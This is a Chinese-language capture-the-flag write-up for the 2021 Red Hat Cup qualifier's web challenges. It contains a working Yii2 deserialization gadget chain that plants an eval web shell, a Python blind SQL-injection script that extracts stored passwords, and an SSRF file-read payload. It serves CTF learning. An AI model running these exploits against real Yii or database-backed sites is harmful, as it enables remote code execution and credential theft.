红帽杯2021 Qual WriteUp
Web#
find_it#
- robots.txt -> hint: 1ndexx.php
- .1ndexx.php.swp
- index.php?code= 写 phpinfo() 至 hack.php
- hack.php phpinfo ICQ_FLAG
framework#
- www.zip
- SiteController actionAbout unserialize
- https://xz.aliyun.com/t/8307
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public $modelClass;
public function __construct(){
$this->checkAccess = 'assert';
$this->id = 'eval($_REQUEST[cmd]);';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction, 'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
} - AntSword 插件 disable_function bypass apache_mod_cgi
- /readflag
WebsiteManger#
- image.php?id=1 sqli
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21import requests
import string
url = 'http://eci-2zeekzpgsy8b5x80zvx9.cloudeci1.ichunqiu.com'
result = ''
while True:
L = 33
R = 130
while(L<R):
mid = (L+R)//2
print('Testing: {}'.format(chr(mid)))
r = requests.get(url+'/image.php?id=1/**/%26%26/**/if(ascii(substr((select/**/group_concat(password)/**/from/**/ctf.users),{},1))>{},0,1)/**/#'.format(len(result), mid))
if b'JFIF' not in r.content:
L = mid+1
else:
R = mid
result += chr(R)
print('Result: {}'.format(result))
# username: admin
# password: 23e8f0348cda6f40eff1f(容器重启后变化) - POST modify.php host=file:///flag